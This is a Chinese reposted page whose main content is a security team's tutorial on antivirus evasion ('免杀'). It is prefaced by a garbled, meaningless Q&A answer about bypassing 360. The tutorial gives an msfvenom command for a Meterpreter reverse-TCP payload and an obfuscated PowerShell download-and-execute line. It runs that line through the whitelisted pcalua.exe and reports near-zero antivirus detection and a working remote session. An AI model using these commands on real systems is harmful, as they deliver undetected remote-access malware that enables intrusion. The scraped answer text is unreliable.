如何给现成的exe做免杀最好过360?

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何给现成的exe做免杀最好过360?相关的知识,希望对你有一定的参考价值。

。。。

参考技术A 俺县城的一个4xl的话,做个360,你可以下载一个就行了。本回答被提问者和网友采纳

远控免杀专题(55)-白名单Pcalua.exe执行payload

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!


声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


一、Pcalua介绍

Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。

默认在C:WindowsSystem32pcalua.exe

二、Pcalua使用

命令为

Pcalua -m -a payload

三、执行payload

这里选择使用powershell生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1

并对powershell命令进行混淆处理。

powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"

然后将该命令写成a.bat批处理,方便执行。metasploit进行监听

远控免杀专题(55)-白名单Pcalua.exe执行payload

在测试机上执行该命令

Pcalua -m -a a.bat

远控免杀专题(55)-白名单Pcalua.exe执行payload

发现只有火绒提示"powershell可执行操作" 放行后msf可上线

远控免杀专题(55)-白名单Pcalua.exe执行payload

放在virustotal.com上a.bat查杀率为1/56

远控免杀专题(55)-白名单Pcalua.exe执行payload

四、参考资料

基于白名单Wmic 执行 payload 第十季复现:https://blog.csdn.net/ws13129/article/details/89791442




E


N


D




远控免杀专题(55)-白名单Pcalua.exe执行payload


guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。



以上是关于如何给现成的exe做免杀最好过360?的主要内容,如果未能解决你的问题,请参考以下文章

灰鸽子怎么做免杀?我用的破解版VIP2006和2007

Metasploit+python生成免杀exe过360杀毒

分享一个免杀的netcat.exe

关于asp和php免杀 大 马的问题

shellcode免杀丨C语言三条指令免杀360!你还困吗?

用exescript生成的exe文件为啥老是被360杀毒报木马?